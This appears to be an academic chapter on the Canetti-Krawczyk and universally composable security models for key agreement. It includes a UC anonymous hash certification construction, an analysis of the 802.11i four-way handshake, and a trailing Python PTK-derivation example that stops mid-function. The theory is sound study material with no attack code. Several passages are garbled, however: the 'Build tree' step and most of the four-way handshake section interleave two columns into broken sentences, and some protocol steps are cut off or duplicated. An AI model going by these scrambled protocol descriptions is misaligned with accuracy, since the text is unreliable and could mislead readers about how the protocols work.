The CK model and the UC security model are at present the most widely used provably secure formal methods for key-agreement protocols. In this section, these two security models are introduced in turn, and the relationship between the security definitions of the two models is also given.

The Canetti-Krawczyk Model

A KE protocol is run in a network of interconnected parties where each party can be activated to run an instance of the protocol called a session. A KE session is a quadruple (A, B, X, Y) where A is the identity of the holder of the session, B the peer, X the outgoing messages in the session, and Y the incoming messages. The session (B, A, Y, X) (if it exists) is said to be matching to the session (A, B, X, Y). Matching sessions play a fundamental role in the definition of security (Canetti & Krawczyk, 2001).

Attacker Model

The attacker is modeled to capture realistic attack capabilities in open networks, including control of the communication links and access to some of the secret information used or generated in the protocol. The attacker, denoted M, is an active "man-in-the-middle" adversary with full control of the communication links between parties. M can intercept and modify messages sent over these links, delay or prevent their delivery, inject its own messages, interleave messages from different sessions, and so forth. (Formally, it is M to whom parties hand their outgoing messages for delivery.) M also schedules all session activations and session-message delivery. In addition, in order to model potential disclosure of secret information, the attacker is allowed access to secret information via session exposure attacks (a.k.a. known-key attacks) of three types: state-reveal queries, session-key queries, and party corruption.

• State-reveal query: A state-reveal query is directed at a single session while still incomplete (i.e., before outputting the session key) and its result is that the attacker learns the session state for that particular session (which may include, for example, the secret exponent of an ephemeral Diffie-Hellman (DH) value, but not the long-term private key used across all sessions at the party).
• Session-key query: A session-key query can be performed against an individual session after completion and the result is that the attacker learns the corresponding session key.
• Party corruption: Party corruption means that the attacker learns all information in the memory of that party (including the long-term private key of the party as well as all session states and session keys stored
at the party); in addition, from the moment a party is corrupted all its actions may be controlled by the attacker. Indeed, note that knowledge of the private key allows the attacker to impersonate the party at will.

Three Components in the CK Model

• The unauthenticated-links adversarial model (UM): The UM is the real network environment; the attacker in this model is an active one and has all the attack capabilities mentioned previously.
• The authenticated-links adversarial model (AM): The adversarial model called AM is defined in a way that is identical to the UM with one fundamental difference: the attacker is restricted to delivering only messages truly generated by the parties, without any change or addition to them.
• Authenticators: Authenticators are special algorithms which act as automatic "compilers" that translate protocols in the AM into equivalent (or "as secure as") protocols in the UM. Two kinds of authenticators are known at present: one is based on public-key digital signatures, the other on message authentication codes (Bellare et al., 1998).

With the CK model, one can first design and analyze a protocol in the AM, then transform the protocol and its security assurance to the realistic UM by applying an authenticator.

Definition of Session-Key Security

In addition to the regular actions of the attacker M against a KE protocol π, M can perform a test-session query. That is, at any time during its run, M is able to choose a test-session among the sessions that are completed, unexpired, and unexposed at the time. Let k be the value of the corresponding session key. We toss a coin b, b ←R {0,1}. If b = 0 we provide M with the value k. Otherwise we provide M with a value r randomly chosen from the probability distribution of keys generated by protocol π. The attacker M is not allowed state-reveal queries, session-key queries, or party corruption on the test-session or its matching session. At the end of its run, M outputs a bit b' (as its guess for b). An attacker that is allowed test-session queries is referred to as a KE-adversary.

Definition 2: Session-key security. A KE protocol π is called session-key secure (or SK-secure) if the following properties hold for any KE-adversary M:

1. Protocol π satisfies the property that if two uncorrupted parties complete matching sessions then they both output the same key; and
2. The probability that M guesses the bit b correctly (i.e., outputs b' = b) is no more than 1/2 plus a negligible fraction ε in the security parameter. ε is called the "advantage."

The Universally Composable Model

Universally composable security is a framework for defining the security of cryptographic protocols (Canetti, 2001). In this framework, an uncorruptible ideal functionality F which provides a certain service, a set of dummy parties P̃, and an ideal adversary S are defined. Only the dummy parties P̃ and the ideal adversary S can access the ideal functionality F; the dummy parties cannot communicate directly with one another, and the ideal adversary can corrupt any dummy party at any time. The ideal adversary S is informed when a message is sent, but not of its content; it is allowed to delay the delivery of such a message, but not to change its content. On the other hand, an actual protocol π that achieves the same service, a set of real parties P, and a real-world adversary A are correspondingly defined. Each real party can communicate directly with the others, and the real-world adversary A controls all communication among them, meaning that A can read or alter all messages among the real parties; moreover, A can corrupt any real party at any time. An environment Z is defined in the UC framework that simulates the whole external environment;
it can generate the inputs to all parties (P or P̃), read all outputs, and in addition interact with the adversary (A or S) in an arbitrary way throughout the computation. The environment Z is forbidden to directly access the ideal functionality F. The framework of universally composable security is shown in Figure 1.

Figure 1. The framework of universally composable security

Definition 3: Universally composable security (Canetti, 2001). In the UC framework, a real protocol π securely realizes an ideal functionality F if, for every A and every Z, it exhibits the same "behavior" as F. Formally, a protocol π securely realizes an ideal functionality F if for any real-life adversary A there exists an ideal-process adversary S such that, for any environment Z and on any input, the probability that Z outputs "1" after interacting with A and parties running π in the real-life model differs by at most a negligible fraction from the probability that Z outputs "1" after interacting with S and F in the ideal process.

Definition 4: Composition theorem (Canetti, 2001). The key advantage of UC security is that we can build a complex protocol from already designed sub-protocols that securely achieve the given local tasks. This is very important, since complex systems are usually divided into several sub-systems, each one performing a specific task securely. Canetti presented this feature as the composition theorem. The theorem assures that a large "UC-secure" cryptographic protocol can be constructed from sub-protocols each of which has been proven secure in the UC sense.

Definition 5: Hybrid model (Canetti, 2001). In order to state the aforementioned definition and to formalize the notion of an actual protocol with access to multiple copies of an ideal functionality, Canetti also introduced the hybrid model, which is identical to the actual model except for the following: on top of sending messages to each other, the parties may send messages to and receive messages from an unbounded number of copies of an ideal functionality F. The copies of F are differentiated by their session identifiers (SIDs); all messages addressed to each copy and all messages sent by each copy carry the corresponding SID.

The Relationship Between SK-Security and UC-Security

UC-security is strictly stronger than SK-security. That is, for KE protocols, any UC-secure key-agreement protocol is SK-secure, but an SK-secure key-agreement protocol is not necessarily UC-secure.

Claim 1: Any protocol that is UC-secure is SK-secure. This holds in the UM and in the AM.

Definition 6: Acknowledgment (ACK) property. Let F be an ideal functionality and let π be an SK-secure KE protocol in the F-hybrid model. An algorithm I is said to be an internal state simulator if for any environment machine Z and any adversary A we have:
$$\mathrm{HYB}^{F}_{\pi,A,Z} \approx \mathrm{HYB}^{F}_{\pi,A,Z,I}$$

Protocol π is said to have the ACK property if there exists a good internal state simulator for π.

• Theorem 1: Let π be a KE protocol that has the ACK property and is SK-secure; then π is UC-secure (Canetti & Krawczyk, 2002).

SECURITY ANALYSIS OF THE CANETTI-KRAWCZYK MODEL

In the past 20 years, researchers have made many efforts in designing and analyzing KE protocols (Diffie & Hellman, 1976; Diffie, Van Oorschot, & Wiener, 1992; Krawczyk, 1996; Shoup, 1999). They realized that the potential impact of the compromise of various types of keying material in a key-agreement protocol should be considered, even if such compromise is not normally expected (Menezes et al., 1996). Accordingly, a number of desirable security properties that a key-agreement protocol should have were identified. Such security properties include perfect forward secrecy (PFS), loss of information, known-key security, key-compromise impersonation, unknown key-share, key control, and so on.

The main goal of the CK model is to design and analyze key-agreement protocols. What, then, is the relationship between the CK model and the desirable security attributes of a key-agreement protocol? This question is the main motivation of this section.

Properties of Key-Agreement Protocols

Definition 7: (Implicit) key authentication (Menezes et al., 1996). Key authentication is the property whereby one party is assured that no other party aside from a specifically identified second party (and possibly additional identified trusted parties) may gain access to a particular secret key.

A key-agreement protocol which provides implicit key authentication to both participating entities is called an authentication and key-agreement (AKA) protocol.

Definition 8: Key confirmation (Menezes et al., 1996). Key confirmation is the property whereby one party is assured that a second (possibly unidentified) party actually has possession of a particular secret key.

Definition 9: Explicit key authentication (Menezes et al., 1996). Explicit key authentication is the property obtained when both (implicit) key authentication and key confirmation hold.

A key-agreement protocol which provides explicit key authentication to both participating entities is called an authenticated key agreement with key confirmation (AKC) protocol (Menezes et al., 1996).

A secure key-agreement protocol should be able to withstand both passive and active attacks. In addition to implicit key authentication and key confirmation, a number of desirable security attributes of key-agreement protocols have been identified (Law, Menezes, Qu, Solinas, & Vanstone, 1998).

1. (Perfect) forward secrecy: If the long-term private keys of one or more entities are compromised, the secrecy of previous session keys established by honest entities is not affected (Menezes et al., 1996).
2. Loss of information: Compromise of other information that would not ordinarily be available to an adversary does not affect the security of the protocol. For example, in Diffie-Hellman type protocols, security is not compromised by loss of $\alpha^{s_i s_j}$ (where $s_i$ represents entity i's long-term secret value) (Blake-Wilson, Johnson, & Menezes, 1997).
3. Known-key security: A protocol is said to be vulnerable to a known-key attack if compromise of past session keys allows either a passive adversary to compromise future session keys, or impersonation by an active adversary in the future (Law et al., 1998).
4. Key-compromise impersonation: Suppose A's long-term private key is disclosed. Clearly an adversary that knows this value can now impersonate A, since it is precisely this value
that identifies A. However, it may be desirable that this loss does not enable an adversary to impersonate other entities to A (Law et al., 1998).
5. Unknown key-share: Entity A cannot be coerced into sharing a key with entity B without A's knowledge, that is, when A believes the key is shared with some entity C ≠ B, and B (correctly) believes the key is shared with A (Law et al., 1998).
6. Key control: Neither entity should be able to force the session key to a preselected value (Law et al., 1998).

The Relationship Between the CK Model and the Desirable Security Attributes

• Theorem 2: A key-agreement protocol designed and proved secure in the CK model offers almost all of the desirable security properties mentioned above, except key control (Li, Ma, & Moon, 2005).

The Relationship Between the Security Attributes and the Two Requirements of SK-Security

In the CK model, some security attributes are ensured by the first requirement of SK-security, others by the second requirement. Theorem 3 and Theorem 4 make this precise:

• Theorem 3: The first requirement of SK-security guarantees that a protocol resists impersonation attacks and unknown key-share attacks (Li et al., 2005).
• Theorem 4: The second requirement of SK-security guarantees that a protocol offers PFS and known-key security (Li et al., 2005).

It should be noted that the first requirement is the precondition of SK-security. Only under this consistency condition does it make sense to investigate the security properties of PFS and known-key security.

Advantages and Disadvantages of the CK Model

Advantages of the CK Model

Why is the CK model applicable for designing and analyzing key-agreement protocols? First, the indistinguishability between the session key and a random value is used to establish the SK-security of a key-agreement protocol in the AM. If an attacker could distinguish the session key from a random value with non-negligible advantage, a mathematically hard problem would be solved. By this reduction to absurdity, a conclusion follows: no matter what methods are used by the attacker (except party corruption, session-state reveal and session-key query on the test-session), it cannot distinguish the session key from a random value with non-negligible advantage. So, within the attack capabilities the model grants the adversary, a protocol designed and proved secure in the CK model resists known and even unknown attacks.

Second, the CK model employs authenticators to achieve the indistinguishability between the protocol in the AM and the corresponding one in the UM. Through this method, the consistency requirement of SK-security is satisfied.

From the previous analysis, it can be seen that this model is a modular approach to provably secure protocols. With this model, we can readily obtain a provably secure protocol that offers almost all the desirable security attributes. The CK model also has a composable character and can be used as an engineering approach (Bellare & Rogaway, 1993; Mitchell, Ward, & Wilson, 1998). Therefore, it is possible to use this approach without detailed knowledge of the formal models and proofs, which makes it efficient and suitable for use by practitioners.

Disadvantages of the CK Model

Though the CK model is suitable for the design and analysis of key-agreement protocols, it still has some weaknesses, as follows:
1. The CK model cannot detect security weaknesses that exist in key-agreement protocols, whereas some other formal methods have this ability, such as the method based on logic (Burrows, Abadi, & Needham, 1990) and the method based on state machines (Tin, Boyd, & Nieto, 2003). The CK model can, however, confirm known attacks; that is, the model can prove that a protocol in which flaws have been found is not SK-secure.
2. With respect to forward secrecy, the CK model cannot guarantee that a key-agreement protocol offers forward secrecy against compromise of both parties' private keys; it can only guarantee forward secrecy with respect to one party. In addition, in ID-based systems this model cannot guarantee key generation center (KGC) forward secrecy, because it does not fully consider the attacker's capabilities (Canetti & Krawczyk, 2002).
3. From Theorem 2, we know that protocols designed and proved secure in the CK model need not resist key control, which is not fully consistent with the definition of key agreement (Blake-Wilson et al., 1997).
4. A key-agreement protocol designed and proved secure in the CK model cannot be guaranteed to resist denial-of-service (DoS) attacks. However, DoS attacks have become a common threat in the present Internet and have drawn researchers' attention (Burrows et al., 1990; Meadows, 1996).
5. Some proofs of protocols in the CK model are not very credible because of the subtlety of the model. For example, the Bellare-Rogaway three-party key-distribution (3PKD) protocol (Bellare & Rogaway, 1995) came with a claimed proof of security, but flaws were subsequently found in it (Choo, Hitchcock, & Boyd, 2005).

We know that a protocol designed and proved secure in the CK model offers almost all the security attributes, and that the model has modular and composable characteristics, so it is very practical and efficient for the design of a key-agreement protocol. But the model still has weaknesses. So when the CK model is employed to design a key-agreement protocol, we should pay attention to the possible flaws in the protocol that may result from the weaknesses of the CK model.

A UNIVERSALLY COMPOSABLE ANONYMOUS HASH CERTIFICATION MODEL

The essence and difficulty of UC-secure protocol design lies in the formalization and abstraction of an ideal functionality which can be realized securely. We consider the special security requirements of ideal anonymous authentication, define the security notions for them, realize an anonymous hash certification ideal functionality F_Cred in the universally composable security sense, and present a more universal certificate authority model F_HCA (Canetti, 2004), which can issue anonymous hash certificates.

Anonymous Hash Certification Ideal Functionality F_Cred

We use a Merkle tree to build the hash chain, which is constructed from each leaf up to the root of the tree. Each unit of the chain contains a value and an order bit which identifies whether the given value should be concatenated from the left or the right.

A hash chain h is said to be valid under a collision-free hash function H if $h_0 = h'_0$ and $h'_{d-1} = v$, with $h'_{i-1} = H(h_i \,\|\, h'_i)$ when $o_i = l$ and $h'_{i-1} = H(h'_i \,\|\, h_i)$ when $o_i = r$, for $i = d-1, d-2, \dots, 1$. This is written isvalid(h) = 1. We also define several other functions: root(h) returns the root of a hash chain, leaf(h) returns the value of the leaf node of path h, buildtree_H(C) builds a Merkle tree over the values of the set C, and getchain_T(e) extracts the path of node e in the tree T.

Security Requirements of F_Cred

Definition 10. Let k be a security parameter and ε(k) be a negligible function of k. Let s be a
signature key and v be a verification key. We say that an anonymous hash certification protocol satisfies the security requirements if the following properties hold:

Completeness. For any valid credential (c, p_i, k, h),
$$\Pr[(s, v) \leftarrow \mathrm{gen}(1^k);\ 0 \leftarrow \mathrm{VerifyCredential}(c, z, k, p_j, h, \sigma, v)] < \varepsilon(k),$$
where σ is the signature of root(h).

Consistency. For any valid credential (c, p_i, k, h), the probability that VerifyCredential(c, z, k, p_j, h, σ, v) generates two different outputs in two independent invocations is smaller than ε(k).

Unforgeability. For any PPT forger F,
$$\Pr[(s, v) \leftarrow \mathrm{gen}(1^k);\ (c, p_j, k, h) \leftarrow F^{\mathrm{Cred}}(v);\ 1 \leftarrow \mathrm{VerifyCredential}(c, z, k, p_j, h, \sigma, v)] < \varepsilon(k),$$
where F never asks the signature functionality F_SIG to sign root(h).

The Construction of the Anonymous Hash Certification Ideal Functionality F_Cred

The functionality is realized using a signature scheme SS = (Kg, Sig, Vf), a symmetric encryption scheme, a pseudorandom function R, and a collision-free, one-way hash function H. For simplicity we assume that SS is CMA-secure.

In the anonymous hash certification ideal functionality, the entities are denoted ASU for the authentication server, also written P_0 for simplicity, and P_1, ..., P_m for the subscribers and authenticators.

Two security parameters, k_1 and k_2, are used in this ideal functionality. The parameter k_1 is the key length of the symmetric cipher, and k_2 is the length of the string used to identify the authenticator. A special function φ maps the identity of an authenticator to a subset of [k_2] such that φ(p_j) has cardinality k_2/2, and φ(p_i) ≠ φ(p_j) for p_i ≠ p_j.

The credential is denoted c_i = (c, p_i, k, h), where c is the encrypted real identity of the subscriber, p_i is the owner identity of the credential, k is the secret information, that is, the hash pre-images, of length k_2, and h is the Merkle hash chain path of this credential. The value of this credential is defined as
$$\mathrm{val}_H(c_i) = c \,\|\, H(k_1) \,\|\, H(k_2) \,\|\, \cdots \,\|\, H(k_{k_2}).$$

A counter t, initialized to 0, is used to index the credentials c_i issued in period i. A set of credentials C = ∪ c_i and a set of credentials to be used, T_prepared, are initialized to ∅.

1. Present Credential

Upon receiving a message (Present Credential, p_i, c, z, p_j) from some party p_i, send (Present Credential, p_i, c, z, p_j) to the adversary. Return the message from the adversary to p_i.

2. Verify Credential

Upon receiving a message (VerifyCredential, p_i, c, z, k̃, p_j, h', σ, v) from some party p_i, send (VerifyCredential, p_i, c, z, k̃, p_j, h', σ, v) to the adversary. Return the message from the adversary to p_i.

3. Check Reuse

Upon reception of (Check Reuse, p_s, c, z, k̃_1, k̃_2, p_{j1}, p_{j2}, h, σ, v) from some party p_s, execute (VerifyCredential, p_i, c, z, k̃_i, p_{ji}, h', σ, v) for i = 1, 2.

• If at least one execution returns (VerifyCredential, p_s, c, p_{ji}, invalid), then return
(VerifyCredential, p_s, c, p_{ji}, invalid) to p_s.
• If p_{j1} = p_{j2} then return (Check Reuse, p_s, c, no), otherwise return (Check Reuse, p_s, c, yes) to p_s. (end)

Construction of a UC-Secure Anonymous Hash Certification Protocol

In this section, we present a simple protocol that realizes F_Cred given F_SIG, with the aid of ideally authenticated communication with a "trusted anonymous hash certificate authority." This set-up assumption is formalized as an ideal functionality F_HCA. First we modify the definition of F_SIG (Canetti, 2004; Michael & Dennis, 2004) as follows.

1. Key generation

Upon reception of (KeyGen, P) from P:
• Send (KeyGen, P) to the adversary S.
• After receiving the message (VerificationKey, P, q) from S, record (P, q) and send (VerificationKey, P, q) to P.

2. Signature generation

Upon reception of (Sign, P, m) from P:
• Send (Sign, P, m) to S.
• After receiving the message (Signature, P, m, σ) from S, look for a record (m, σ, q, 0). If it is found, send an error message to P and halt. Else, send (Signature, P, m, σ) to P and record (m, σ, q, 1).

3. Signature verification

Upon reception of (Verify, P, m, σ, q') from a verifier V:
• Send (Verify, P, m, σ, q') to S.
• After receiving from S the message (Verified, P, m, σ, q') together with a proposed result, proceed as follows:
  1. If q' = q and there exists a record (m, σ, q, 1), set f = 1.
  2. If q' = q, P has not been corrupted by S, and there exists no record (m, σ', q, 1) for any σ', set f = 0.
  3. If q' ≠ q and there exists a record (m, σ, q', f'), set f = f'.
  4. Else, set f to the result proposed by S and record (m, σ, q', f).
• Hand (Verified, P, m, f) to V. (end)

Then the anonymous hash certificate authority functionality F_HCA is presented as follows.

1. Key generation

Upon reception of the message (GenerateKey) from ASU, send (KeyGen, ASU) to the adversary S; upon receiving (VerificationKey, ASU, v, k) from S, where v is a verification key and k an encryption key, record (ASU, v, k) and return (VerificationKey, ASU, v).

2. Identity encryption

Upon reception of the message (Identity encryption, p_i) from p_i, proceed as follows:
  1. Verify that p_i is in the member list. If not, return (Not A Member, p_i) and quit.
  2. Else, send (Identity encryption, p_i) to the adversary S, receive the encrypted identity c of p_i, and return (Encrypted identity, p_i, c).

3. Credential generation

Upon reception of the message (Credential generation, p_i, (c, p_i, k, z)) from p_i, send this message to the adversary and wait for an OK from the adversary. Then store the credential e = (c, p_i, k, ∅) in the set C_t, return (New Credential, p_i) to S and (New Credential, c, z) to p_i.
4. Build tree (Identity encryption, pi) to FHCA. Upon re-


Upon reception of the message (Build tree, ASU) ceiving the message (Encrypted identity,
from ASU, set T ← buildtreeH (valH (Ct )) and pi, c) from FHCA , it calculates secret infor-
modify each credential e = (c, pi, k, f) of Ct into mation k j ← ( R i (c ||j )) kj2=1 , z ← H (k ) ,
(c, pi, k, getchainT (valH (e))), and send (Sign, ASU, sent (Credential generation, pi, (c, pi, k, z))
root(T)) to the adversary S. Upon receiving the to FHCA. ~
message (Signature, ASU, root(T), σ) from S, verify that no entry (root(T), σ, 0) is recorded; if it is, then output an error message to S and halt, else record the entry (root(T), σ, 1), return (Build Tree, ASU, T, σ) to S, and set t ← t + 1.

5. Add prepared credential
Upon reception of the message (Add prepared credential, pi, (c, pj)) from pi, send this message to the adversary, and wait for an OK from the adversary. Then, add (c, pj) to the set Tprepared and return OK.

6. Check prepared credential
Upon reception of the message (Check prepared credential, pi, (c, pj)) from pi, send this message to the adversary, and wait for an OK from the adversary. Then, find (c, pj) in the set Tprepared, and return OK if this entry exists.

7. Check exist of credential
Upon reception of the message (Check exist of credential, pi, (c, pj, k, h)) from pi, send this message to the adversary, and wait for an OK from the adversary. Then, find (c, pj, k, h) in the set C, and return OK if this entry exists.

8. Reveal ID
Upon reception of the message (Reveal ID, ASU, c) from ASU, find a credential (c, p, ., .) in the set C. If no such entry exists, then send (Reveal ID, ASU, c) to the adversary S. Once the message (c, p) is received from S, return (Reveal ID, ASU, c, p).

Finally, we present a protocol pCred that realizes FCred in the (FSIG, FHCA)-hybrid model in a straightforward way as follows.

1. Present Credential
  1. pi receives a message (Present Credential, c, z, pj).
  2. If pi has not owned a credential, it creates a symmetric key Ri ←R {0,1}^k1 with a pseudorandom function and sends
  3. Else pi sets k̃ ← k(Pj) and outputs (Present Credential, c, k̃), if kl ← (Ri(c||l))_{l=1}^{k2} and z = H(k).
  4. Otherwise, it outputs the message (Reject Present Credential, c) and quits.

2. Verify Credential
  1. pi verifies the validity of (c, z, k̃, pj, h, σ, v).
  2. pi sends (Verify, pi, root(h), σ, v) to FSIG and then executes the signature verification process of FSIG.
  3. pi sends (Check prepared credential, pi, (c, pj, pi)) to FHCA, and waits for an OK from FHCA.
  4. pi verifies isvalidH(h) = 1 and H(k̃) = z(Pj).
  5. If FSIG returns 0 or any of the above conditions is not satisfied, it returns (Verify Credential, pi, c, pj, invalid) and quits.
  6. Else pi returns (Verify Credential, pi, c, pj, valid).

3. Check Reuse
  1. pi checks the reuse of (c, z, k̃1, k̃2, h, σ, pj1, pj2).
  2. It executes (Verify Credential, c, z, k̃i, h, σ, pji) for i = 1, 2.
  3. If at least one execution returns (Verify Credential, c, pji, invalid), then pi returns (Check Reuse, c, invalid) and quits.
  4. If pj1 = pj2 then pi returns (Check Reuse, c, no), otherwise it returns (Check Reuse, c, yes).

Proof that pCred Securely Realizes FCred in the (FSIG, FHCA)-Hybrid Model

Theorem 5. Protocol pCred securely realizes FCred in the (FSIG, FHCA)-hybrid model.
The Provably Secure Formal Method

Figure 2. The construction of an adversary S (figure labels: S, Z', A, P0, P1, P̃0, P̃1, FCred)

Proof. Let A be an adversary that interacts with entities running pCred in the (FSIG, FHCA)-hybrid model. We construct an ideal-process adversary S such that the view of any environment Z of an interaction with A and pCred is distributed identically to its view of an interaction with S in the ideal process for FCred.

1. The construction of adversary S

The adversary S runs an internal copy of the environment Z, the adversary A and each of the involved parties pi. All messages from Z to A are written to A's input tape. In addition, S does the following: for each player pi that the real-world adversary A corrupts, the ideal adversary S corrupts the corresponding dummy player pi. When a corrupted dummy player pi receives a message m from Z, the adversary S lets Z' send m to pi. When a corrupted pi outputs a message m to Z', then S instructs the corrupted pi to output m to Z. This corresponds to pi being linked directly to Z. The construction of the adversary S is shown in Figure 2.

2. The operations of adversary S

Simulating Present Credential

When S receives in the ideal process FCred a message (Present Credential, pi, c, z, pj), it proceeds as follows:

1. If pi has not owned a credential, then simulate for A the process of credential generation. That is, send to A (in the name of FHCA) the message (Identity encryption, pi), obtain the response from A, then set a random number ui as the key of pi, i.e., ui ←R {0,1}^k1, record (pi, ui) in the member list and then calculate the secret information kj ← (Ui(c||j))_{j=1}^{k2}, z ← H(k), where k = (k1, k2, ..., kk2), and send to A the message (Credential generation, pi, (c, pi, k, z)) from FHCA.
2. Simulate for A the process of presenting the credential. That is, set m ←R {0,1}^k2, make sure the number of "1" bits is exactly k2/2 and m has never been produced before, construct the challenge information k̃ ← km by providing the pre-images of the secret information k that correspond to the "1" bits of m, send the message (Add prepared credential, pi, (c, pj)) to A from FHCA, and send (Present Credential, pi, c, k̃) to FCred.
Simulating Verify Credential

1. If a message (Verify Credential, pi, c, z, k̃, pj, h', σ, v) arrives from FCred, it proceeds as follows.
2. Send the message (Check exist of credential, pi, (c, pi, k, h)) to A from FHCA. If the message from FHCA is not OK, send (Verify Credential, pi, c, pj, invalid) to FCred and quit.
3. Else check the path: if h' ≠ h, then send (Verify Credential, pi, c, pj, invalid) to FCred and quit.
4. Else, verify the signature: send (Verify, pi, root(h), σ, v) to A (in the name of FSIG); upon receiving the message (Verified, pi, root(h), σ) from A,
  (1) If the entry (root(h), σ, 1) is recorded, set f = 1.
  (2) Else, if the signer is not corrupted, and no entry (root(h), σ', 1) for any σ' is recorded, then set f = 0 and record the entry (root(h), σ, 0).
  (3) Else, if there is an entry (root(h), σ, f') recorded, then let f = f'.
  (4) Else, let f = 0 and record the entry (root(h), σ, 0).
  If f = 0, send (Verify Credential, pi, c, pj, invalid) to FCred and quit.
5. Else, verify the validity of the credential:
  (1) If pi is not corrupted,
    (a) Send the message (Check prepared credential, pi, (c, pj)) to A from FHCA.
    (b) If the message from FHCA is not OK or k̃ ≠ km, send to FCred the message (Verify Credential, pi, c, pj, invalid) and quit.
  (2) Else if H(k̃) ≠ zm, send (Verify Credential, pi, c, pj, invalid) to FCred and quit.
  Otherwise return (Verify Credential, pi, c, pj, valid) to FCred.

Simulating party corruptions

If A corrupts a party pi, then S corrupts the same party pi in the ideal process and hands A the internal data of that party pi.

As for the other operations, like Check Reuse, because their definitions are identical in the ideal functionality and the real protocol, there is no need to simulate them for A.

As the simulation is perfect and the proof is direct, the proof procedure can be referred to (Fan, JianFeng, & Moon, 2007).

THE SECURITY ANALYSIS OF FOUR-WAY HANDSHAKE IN 802.11I WITH THE CK MODEL AND UC MODEL

WLAN can provide great flexibility for the users. However, security is always a serious concern because of the openness of the wireless medium for public access within a certain range. To solve the security problems of WLAN, the IEEE 802.11 has designed a new security standard, which is called IEEE 802.11i (IEEE P802.11i D3.0, 2002). In this standard, the concept of a robust security network has been proposed. In addition, an authentication mechanism based on EAP/802.1X/RADIUS (Aboba & Simon, 1999; 802.1X-2001, 2001; Rigney, Willens, Rubens, & Simpson, 2000) has been developed to replace the poor open system authentication and shared-key authentication in WEP (Borisov, Goldberg, & Wagner, 2001). As a long-term solution to secure wireless links, the latest IEEE standard 802.11i has been ratified on June 24, 2004.

The four-way handshake (in short, 4WHS) protocol in 802.11i plays a very important role in the authentication and key-agreement process. Some works have been done on its security analysis. In Changhua and Mitchell (2004) the authors analyzed the four-way handshake protocol using a finite-state verification tool and found a DoS attack. The attack involves forging initial messages from the authenticator to the supplicant to produce inconsistent keys in the peers. However, the repair proposed by the authors involves only a minor change in the

The Provably Secure Formal Method

algorithm used by the supplicant and not involves SPA}||Max{AA,SPA}||Min{ANonce,SNonce}


the protocol itself. || Max{ANonce, SNonce}), and divided into Key
In this section, we give a formal analysis of the Confirmation Key (KCK), Key Encryption Key
four-way handshake. The results show that four- (KEK), and Temporary Key (TK). Note that the
way handshake protocol is secure not only in the MIC is actually calculated with KCK, which is
CK model, but also in the UC security model. So only part of PTK.
it can be securely used as the basic model of the
authentication and key agreement of WLAN. the security Analysis of four-way
Handshake Protocol
the four-way Handshake Protocol in
802.11i According to the thought of CK model, we extract
the protocols 4WHSAM in AM and the authentica-
In 802.11i, once a shared pairwise master key torprf9 . We can further analyze that whether the
(PMK) is agreed upon between the authenticator protocol 4WHSAMisSK-secureintheAM 9 . or
prf
and the supplicant, the authenticator may begin a the protocolis an effective MT-authenticator or not,
four-way handshake by itself or upon request from thus we can draw the conclusion that whether four-
the supplicant. The message exchange is shown, at wayhandshakeprotocolcansatisfythedefinition
an abstract level, in Figure 3. S represents the Sup- of SK-security in the UM or not.
plicant and A represents the Authenticator; SPA and
AA, SNonce and ANonce, represent the message Protocol 4wHsAM
authentication code (MAC) address and nonces of
the supplicant and authenticator, respectively; sn is This protocol is described as follows:
the sequence number; msg1, 2, 3, 4 are indicators 1. Both players pre-share a key kij.
of different message types; MICPTK{} represents 2. The initiator pi, on input (pi, pj, s), chooses
the message integrity code (MIC) calculated for the ri ←R
 {0,1}kand sends (pi, s, ri) to pj;
contents inside the bracket with the fresh pairwise
transient key (PTK). While MAC is commonly 3. Upon receipt of (pi, s, ri), the responder pj
used in cryptography to refer to a MAC, the term  {0,1} , where rj ≠ ri, and sends
k
chooses rj ← R
MIC is used instead in connection with 802.11i (pj, s, rj, tj) to pi. Then pj outputs session key
because MAC has another standard meaning, prf kij (ri, rj).
medium access control, in networking.
The fresh PTK is derived from the shared 4. Upon receipt of (pj,s, rj) player pj outputs
PMK through a pseudo random function with session key prf kij (ri, rj).
output length X ( PRF-X), say, PTK = PRF-
X(PMK, “Pairwise key expansion” || Min{AA,

Figure 3. The idealized 4-way handshake protocol
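The PTK derivation and the KCK-keyed MIC described above, as an added example (not code from the chapter or from any 802.11i implementation). The chapter names the PRF only as PRF-X; the HMAC-SHA1 expansion and the 16-byte HMAC-SHA1 MIC used here are the constructions of IEEE 802.11i for the AES-CCMP key descriptor, stated as assumptions of this example, and the PMK, addresses, nonces and EAPOL-Key frame are constructed sample values.

```python
"""IEEE 802.11i pairwise key hierarchy: PTK derivation and the KCK-keyed MIC.

Added example; not code from the chapter.  Assumptions: the PRF-X expansion is
HMAC-SHA1 based and the MIC is HMAC-SHA1 truncated to 16 bytes (the AES-CCMP
key-descriptor variant of 802.11i); all sample values are constructed.
"""
import hashlib
import hmac


def prf_x(key: bytes, label: bytes, data: bytes, x_bits: int) -> bytes:
    """PRF-X(K, A, B): concatenate HMAC-SHA1(K, A || 0x00 || B || i) for
    i = 0, 1, ... until at least X bits exist, then truncate to X bits."""
    out = b""
    i = 0
    while len(out) * 8 < x_bits:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[: x_bits // 8]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes,
               x_bits: int = 384) -> bytes:
    """PTK = PRF-X(PMK, "Pairwise key expansion" || Min{AA,SPA} || Max{AA,SPA}
    || Min{ANonce,SNonce} || Max{ANonce,SNonce}).  Min/Max order the two
    addresses and the two nonces bytewise, so supplicant and authenticator
    derive the same PTK whichever side each value came from."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_x(pmk, b"Pairwise key expansion", data, x_bits)


def split_ptk(ptk: bytes):
    """PTK-384 is divided into KCK (16 bytes), KEK (16 bytes) and TK (16 bytes)."""
    return ptk[0:16], ptk[16:32], ptk[32:48]


# Offset of the 16-byte Key MIC field inside an EAPOL-Key frame:
# EAPOL header (4) + descriptor type (1) + key info (2) + key length (2)
# + replay counter (8) + key nonce (32) + key IV (16) + key RSC (8) + reserved (8).
MIC_OFFSET = 4 + 1 + 2 + 2 + 8 + 32 + 16 + 8 + 8
MIC_LEN = 16


def eapol_key_frame(key_info: int, replay_counter: int, nonce: bytes, key_data: bytes) -> bytes:
    """Constructed EAPOL-Key frame with the MIC field zeroed (the form the MIC is
    computed over).  key_info is carried as given; its bits are not interpreted."""
    assert len(nonce) == 32
    body = (bytes([2])                               # descriptor type 2 (RSN key descriptor)
            + key_info.to_bytes(2, "big")
            + (16).to_bytes(2, "big")                # key length of a CCMP TK
            + replay_counter.to_bytes(8, "big")
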